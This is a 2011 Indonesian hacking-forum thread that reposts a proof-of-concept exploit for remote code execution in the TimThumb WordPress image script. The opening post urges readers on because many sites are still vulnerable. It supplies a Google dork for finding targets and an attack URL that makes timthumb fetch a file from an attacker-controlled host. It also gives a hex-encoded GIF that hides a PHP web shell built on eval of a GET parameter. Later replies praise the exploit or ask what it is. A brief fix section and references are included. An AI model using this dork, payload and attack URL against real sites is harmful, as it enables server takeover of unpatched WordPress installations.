.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 WordPress TimThumb Plugin - Remote Code Execution

Go down 
3 posters
PengirimMessage
Arikanami
Pro Nubie
Pro Nubie
Arikanami


Jumlah posting : 67
Points : 171
Reputation : 3
Join date : 26.08.11

WordPress TimThumb Plugin - Remote Code Execution Empty
PostSubyek: WordPress TimThumb Plugin - Remote Code Execution   WordPress TimThumb Plugin - Remote Code Execution Icon_minitimeSat Aug 27, 2011 6:07 pm

masih banyak yang kena gan sama ini explit :jempol1

# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)


WordPress TimThumb (Theme) Plugin - Remote Code Execution


Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)


Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.


External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/

Credits:
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)


-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, due to the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.


Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php

Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.


Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

(Transparent GIF + <?php @eval($_GET['cmd']) ?>



-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.

NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb


Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011



References:
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
http://code.google.com/p/timthumb/issues/detail?id=212
http://programming.arantius.com/the+smallest+possible+gif
Kembali Ke Atas Go down
kenahack
NuuBiiTooL
NuuBiiTooL
kenahack


Jumlah posting : 8
Points : 11
Reputation : 1
Join date : 07.09.11

WordPress TimThumb Plugin - Remote Code Execution Empty
PostSubyek: Re: WordPress TimThumb Plugin - Remote Code Execution   WordPress TimThumb Plugin - Remote Code Execution Icon_minitimeSat Oct 15, 2011 9:22 am

terbaik , rce perlu diambil perhatian om.. banyak 0day tu :D
Kembali Ke Atas Go down
green.day
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 9
Points : 9
Reputation : 0
Join date : 27.02.12

WordPress TimThumb Plugin - Remote Code Execution Empty
PostSubyek: Re: WordPress TimThumb Plugin - Remote Code Execution   WordPress TimThumb Plugin - Remote Code Execution Icon_minitimeMon Feb 27, 2012 9:52 pm

jelasin dong om apa nih... :capedeh
Kembali Ke Atas Go down
Sponsored content





WordPress TimThumb Plugin - Remote Code Execution Empty
PostSubyek: Re: WordPress TimThumb Plugin - Remote Code Execution   WordPress TimThumb Plugin - Remote Code Execution Icon_minitime

Kembali Ke Atas Go down
 
WordPress TimThumb Plugin - Remote Code Execution
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Exploit Remote Code Execution untuk hacking CMS Zenphoto
» Hack WordPress yang menggunakan plugin Omni Secure Files Plugin 0.1.13 dengan memanfaatkan celah Arbitrary File Upload
» Wordpress Plugin EasyComment Upload Vulnerability
» WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi
» WordPress Editor Monkey suffers from a remote shell upload vulnerability

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: